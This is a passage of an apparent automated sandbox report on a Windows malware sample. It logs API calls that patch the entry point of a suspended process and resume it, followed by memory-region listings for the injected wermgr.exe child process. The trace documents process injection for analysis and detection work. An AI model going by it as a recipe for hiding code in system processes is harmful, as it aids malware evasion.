[464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0207.614] NtProtectVirtualMemory (in: ProcessHandle=0x26c, BaseAddress=0x607f7c4*=0x1a9700, NumberOfBytesToProtect=0x607f7d4, NewAccessProtection=0x4, OldAccessProtection=0x607f7c8 | out: BaseAddress=0x607f7c4*=0x1a9000, NumberOfBytesToProtect=0x607f7d4, OldAccessProtection=0x607f7c8*=0x20) returned 0x0 [0207.614] NtWriteVirtualMemory (in: ProcessHandle=0x26c, BaseAddress=0x1a9700, Buffer=0x607f7cc*, NumberOfBytesToWrite=0x5, NumberOfBytesWritten=0x607f7d4 | out: Buffer=0x607f7cc*, NumberOfBytesWritten=0x607f7d4*=0x5) returned 0x0 [0207.616] NtProtectVirtualMemory (in: ProcessHandle=0x26c, BaseAddress=0x607f7bc*=0x1a9700, NumberOfBytesToProtect=0x607f7d4, NewAccessProtection=0x20, OldAccessProtection=0x607f7c0 | out: BaseAddress=0x607f7bc*=0x1a9000, NumberOfBytesToProtect=0x607f7d4, OldAccessProtection=0x607f7c0*=0x4) returned 0x0 [0207.664] NtProtectVirtualMemory (in: ProcessHandle=0x26c, BaseAddress=0x607f7b4*=0x4401550, NumberOfBytesToProtect=0x607f7b8, NewAccessProtection=0x40, OldAccessProtection=0x607f7d8 | out: BaseAddress=0x607f7b4*=0x4401000, NumberOfBytesToProtect=0x607f7b8, OldAccessProtection=0x607f7d8*=0x40) returned 0x0 [0207.703] lstrlenW (lpString="䉁䑃䙅") returned 3 [0207.703] lstrlenW (lpString="䉁䑃䙅") returned 3 [0207.703] lstrlenW (lpString="䉁䑃䙅") returned 3 [0207.703] lstrlenW (lpString="䉁䑃䙅") returned 3 [0207.703] lstrlenW (lpString="䉁䑃䙅") returned 3 [0207.703] lstrlenW (lpString="䉁䑃䙅") returned 3 [0207.703] lstrlenW (lpString="䉁䑃䙅") returned 3 [0207.704] lstrlenW (lpString="䉁䑃䙅") returned 3 [0207.704] lstrlenW (lpString="䉁䑃䙅") returned 3 [0207.704] lstrlenW (lpString="䉁䑃䙅") returned 3 [0207.704] lstrlenW (lpString="䉁䑃䙅") returned 3 [0207.704] lstrlenW (lpString="䉁䑃䙅") returned 3 [0207.704] lstrlenW (lpString="䉁䑃䙅") returned 3 [0207.704] lstrlenW (lpString="䉁䑃䙅") returned 3 [0207.704] lstrlenW (lpString="䉁䑃䙅") returned 3 [0207.704] lstrlenW (lpString="䉁䑃䙅") returned 3 [0207.704] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x47) returned 0x6200f58 [0207.704] _vsnprintf (in: _DstBuf=0x607f7bc, _MaxCount=0x28, _Format="{%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}", _ArgList=0x607ed64 | out: _DstBuf="{A310C111-CEDF-4B1D-9A50-2B2447874BB3}") returned 38 [0207.705] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6200f58 | out: hHeap=0x6200000) returned 1 [0207.705] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName="{A310C111-CEDF-4B1D-9A50-2B2447874BB3}") returned 0x274 [0207.705] GetLastError () returned 0x0 [0207.705] ResumeThread (hThread=0x268) returned 0x1 [0207.714] WaitForSingleObject (hHandle=0x274, dwMilliseconds=0x2710) returned 0x0 [0210.946] CloseHandle (hObject=0x274) returned 1 [0210.946] CloseHandle (hObject=0x268) returned 1 [0210.946] CloseHandle (hObject=0x26c) returned 1 [0210.947] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f008 | out: hHeap=0x6200000) returned 1 [0210.947] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6200eb0 | out: hHeap=0x6200000) returned 1 [0210.947] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6200f10 | out: hHeap=0x6200000) returned 1 [0210.947] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x62009f0 | out: hHeap=0x6200000) returned 1 [0210.948] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569870 | out: hHeap=0x550000) returned 1 [0210.948] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x58ce08 | out: hHeap=0x550000) returned 1 Process: id = "7" image_name = "wermgr.exe" filename = "c:\\windows\\syswow64\\wermgr.exe" page_root = "0xe8f5000" os_pid = "0x1330" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x9a8" cmd_line = "C:\\Windows\\SysWOW64\\wermgr.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f188" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1188 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1189 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1190 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1191 start_va = 0x90000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1192 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1193 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1194 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1195 start_va = 0x1a0000 end_va = 0x1c5fff monitored = 0 entry_point = 0x1a9700 region_type = mapped_file name = "wermgr.exe" filename = "\\Windows\\SysWOW64\\wermgr.exe" (normalized: "c:\\windows\\syswow64\\wermgr.exe") Region: id = 1196 start_va = 0x1d0000 end_va = 0x41cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1197 start_va = 0x41d0000 end_va = 0x41d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 1198 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 1199 start_va = 0x770a0000 end_va = 0x7721afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1200 start_va = 0x7e940000 end_va = 0x7e962fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e940000" filename = "" Region: id = 1201 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1202 start_va = 0x7fff0000 end_va = 0x7df871dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1203 start_va = 0x7df871e00000 end_va = 0x7ff871dfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df871e00000" filename = "" Region: id = 1204 start_va = 0x7ff871e00000 end_va = 0x7ff871fc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1205 start_va = 0x7ff871fc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff871fc1000" filename = "" Region: id = 1207 start_va = 0x4400000 end_va = 0x4423fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004400000" filename = "" Region: id = 1208 start_va = 0x41e0000 end_va = 0x41e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 1209 start_va = 0x4430000 end_va = 0x454ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 1210 start_va = 0x53800000 end_va = 0x5384ffff monitored = 0 entry_point = 0x53818180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1211 start_va = 0x53850000 end_va = 0x538c9fff monitored = 0 entry_point = 0x53863290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1212 start_va = 0x75a70000 end_va = 0x75b4ffff monitored = 0 entry_point = 0x75a83980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1213 start_va = 0x537f0000 end_va = 0x537f7fff monitored = 0 entry_point = 0x537f17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1214 start_va = 0x4550000 end_va = 0x471ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004550000" filename = "" Region: id = 1215 start_va = 0x75a70000 end_va = 0x75b4ffff monitored = 0 entry_point = 0x75a83980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1216 start_va = 0x75250000 end_va = 0x753cdfff monitored = 0 entry_point = 0x75301b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1217 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1218 start_va = 0x7e840000 end_va = 0x7e93ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e840000" filename = "" Region: id = 1219 start_va = 0x4430000 end_va = 0x44edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1220 start_va = 0x4540000 end_va = 0x454ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 1221 start_va = 0x75cf0000 end_va = 0x75dadfff monitored = 0 entry_point = 0x75d25630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1222 start_va = 0x100000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1223 start_va = 0x140000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1224 start_va = 0x758a0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x75982a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1225 start_va = 0x76650000 end_va = 0x766fcfff monitored = 0 entry_point = 0x76664f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1226 start_va = 0x73dd0000 end_va = 0x73dedfff monitored = 0 entry_point = 0x73ddb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1227 start_va = 0x41d0000 end_va = 0x41d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 1228 start_va = 0x73dc0000 end_va = 0x73dc9fff monitored = 0 entry_point = 0x73dc2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1229 start_va = 0x767a0000 end_va = 0x767f7fff monitored = 0 entry_point = 0x767e25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1230 start_va = 0x75520000 end_va = 0x75563fff monitored = 0 entry_point = 0x75539d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1231 start_va = 0x76700000 end_va = 0x76791fff monitored = 0 entry_point = 0x76738cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1232 start_va = 0x75570000 end_va = 0x755fcfff monitored = 0 entry_point = 0x755b9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1233 start_va = 0x6f1a0000 end_va = 0x6f226fff monitored = 0 entry_point = 0x6f20dbc0 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\SysWOW64\\wer.dll" (normalized: "c:\\windows\\syswow64\\wer.dll") Region: id = 1234 start_va = 0x75820000 end_va = 0x7589afff monitored = 0 entry_point = 0x7583e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1235 start_va = 0x4720000 end_va = 0x485ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004720000" filename = "" Region: id = 1236 start_va = 0x4720000 end_va = 0x4809fff monitored = 0 entry_point = 0x475d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1237 start_va = 0x4850000 end_va = 0x485ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004850000" filename = "" Region: id = 1238 start_va = 0x4550000 end_va = 0x45dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004550000" filename = "" Region: id = 1239 start_va = 0x4620000 end_va = 0x471ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 1240 start_va = 0x6f2e0000 end_va = 0x6f452fff monitored = 0 entry_point = 0x6f38d220 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 1241 start_va = 0x753d0000 end_va = 0x75516fff monitored = 0 entry_point = 0x753e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1242 start_va = 0x75db0000 end_va = 0x75efefff monitored = 0 entry_point = 0x75e66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1243 start_va = 0x44f0000 end_va = 0x4519fff monitored = 0 entry_point = 0x44f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1244 start_va = 0x4860000 end_va = 0x49e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004860000" filename = "" Region: id = 1245 start_va = 0x757f0000 end_va = 0x7581afff monitored = 0 entry_point = 0x757f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1246 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1247 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1248 start_va = 0x49f0000 end_va = 0x4b70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049f0000" filename = "" Region: id = 1249 start_va = 0x4b80000 end_va = 0x5f7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b80000" filename = "" Region: id = 1250 start_va = 0x73df0000 end_va = 0x751eefff monitored = 0 entry_point = 0x73fab990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1251 start_va = 0x757b0000 end_va = 0x757e6fff monitored = 0 entry_point = 0x757b3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1252 start_va = 0x76980000 end_va = 0x76e78fff monitored = 0 entry_point = 0x76b87610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1253 start_va = 0x75bb0000 end_va = 0x75bf4fff monitored = 0 entry_point = 0x75bcde90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1254 start_va = 0x75a60000 end_va = 0x75a6bfff monitored = 0 entry_point = 0x75a63930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1255 start_va = 0x76070000 end_va = 0x760b3fff monitored = 0 entry_point = 0x76077410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1256 start_va = 0x75f00000 end_va = 0x75f0efff monitored = 0 entry_point = 0x75f02e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1257 start_va = 0x76fb0000 end_va = 0x7709afff monitored = 0 entry_point = 0x76fed650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1258 start_va = 0x5f80000 end_va = 0x60bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f80000" filename = "" Region: id = 1259 start_va = 0x75f20000 end_va = 0x75f32fff monitored = 0 entry_point = 0x75f21d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 1260 start_va = 0x6f2c0000 end_va = 0x6f2dbfff monitored = 0 entry_point = 0x6f2c4720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 1261 start_va = 0x6f2a0000 end_va = 0x6f2b4fff monitored = 0 entry_point = 0x6f2a5210 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 1262 start_va = 0x6f290000 end_va = 0x6f299fff monitored = 0 entry_point = 0x6f2928d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 1263 start_va = 0x6f260000 end_va = 0x6f28efff monitored = 0 entry_point = 0x6f275140 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 1264 start_va = 0x6f250000 end_va = 0x6f25ffff monitored = 0 entry_point = 0x6f2534d0 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 1265 start_va = 0x712c0000 end_va = 0x712dafff monitored = 0 entry_point = 0x712c9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1266 start_va = 0x6f230000 end_va = 0x6f248fff monitored = 0 entry_point = 0x6f2347e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1267 start_va = 0x751f0000 end_va = 0x7524efff monitored = 0 entry_point = 0x751f4af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1383 start_va = 0x4720000 end_va = 0x47b8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004720000" filename = "" Region: id = 1384 start_va = 0x44f0000 end_va = 0x452ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 1385 start_va = 0x4550000 end_va = 0x458ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004550000" filename = "" Region: id = 1386 start_va = 0x45d0000 end_va = 0x45dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045d0000" filename = "" Region: id = 1387 start_va = 0x6f190000 end_va = 0x6f19efff monitored = 0 entry_point = 0x6f192a50 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 1388 start_va = 0x41f0000 end_va = 0x41f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 1389 start_va = 0x4530000 end_va = 0x4530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004530000" filename = "" Region: id = 1390 start_va = 0x60c0000 end_va = 0x63f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1391 start_va = 0x6f140000 end_va = 0x6f183fff monitored = 0 entry_point = 0x6f15aaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 1392 start_va = 0x6f120000 end_va = 0x6f132fff monitored = 0 entry_point = 0x6f125c60 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\SysWOW64\\samlib.dll" (normalized: "c:\\windows\\syswow64\\samlib.dll") Region: id = 1393 start_va = 0x4590000 end_va = 0x4593fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 1394 start_va = 0x712f0000 end_va = 0x714fcfff monitored = 0 entry_point = 0x713dacb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1395 start_va = 0x71500000 end_va = 0x7167dfff monitored = 0 entry_point = 0x7157c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1396 start_va = 0x739b0000 end_va = 0x73c7afff monitored = 0 entry_point = 0x73bec4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1397 start_va = 0x73ca0000 end_va = 0x73d14fff monitored = 0 entry_point = 0x73cd9a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1398 start_va = 0x6400000 end_va = 0x64dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006400000" filename = "" Region: id = 1399 start_va = 0x190000 end_va = 0x196fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1400 start_va = 0x45e0000 end_va = 0x461ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045e0000" filename = "" Region: id = 1401 start_va = 0x47c0000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 1402 start_va = 0x760c0000 end_va = 0x76237fff monitored = 0 entry_point = 0x76118a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1403 start_va = 0x76fa0000 end_va = 0x76fadfff monitored = 0 entry_point = 0x76fa5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1404 start_va = 0x4800000 end_va = 0x483ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 1405 start_va = 0x5f80000 end_va = 0x5fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f80000" filename = "" Region: id = 1406 start_va = 0x6020000 end_va = 0x60bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006020000" filename = "" Region: id = 1407 start_va = 0x6400000 end_va = 0x648efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006400000" filename = "" Region: id = 1408 start_va = 0x64d0000 end_va = 0x64dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064d0000" filename = "" Region: id = 1409 start_va = 0x6f750000 end_va = 0x6f777fff monitored = 0 entry_point = 0x6f757820 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1410 start_va = 0x45a0000 end_va = 0x45affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 1411 start_va = 0x5fc0000 end_va = 0x5ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 1412 start_va = 0x6490000 end_va = 0x64cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006490000" filename = "" Region: id = 1413 start_va = 0x64e0000 end_va = 0x651ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064e0000" filename = "" Region: id = 1414 start_va = 0x6520000 end_va = 0x655ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006520000" filename = "" Region: id = 1415 start_va = 0x6560000 end_va = 0x665ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006560000" filename = "" Region: id = 1416 start_va = 0x45a0000 end_va = 0x45bbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 1417 start_va = 0x45c0000 end_va = 0x45cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045c0000" filename = "" Region: id = 1418 start_va = 0x45a0000 end_va = 0x45adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045a0000" filename = "" Region: id = 1419 start_va = 0x45a0000 end_va = 0x45adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045a0000" filename = "" Region: id = 1420 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1421 start_va = 0x45a0000 end_va = 0x45adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045a0000" filename = "" Region: id = 1422 start_va = 0x6660000 end_va = 0x6e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006660000" filename = "" Region: id = 1423 start_va = 0x45a0000 end_va = 0x45adfff monitored = 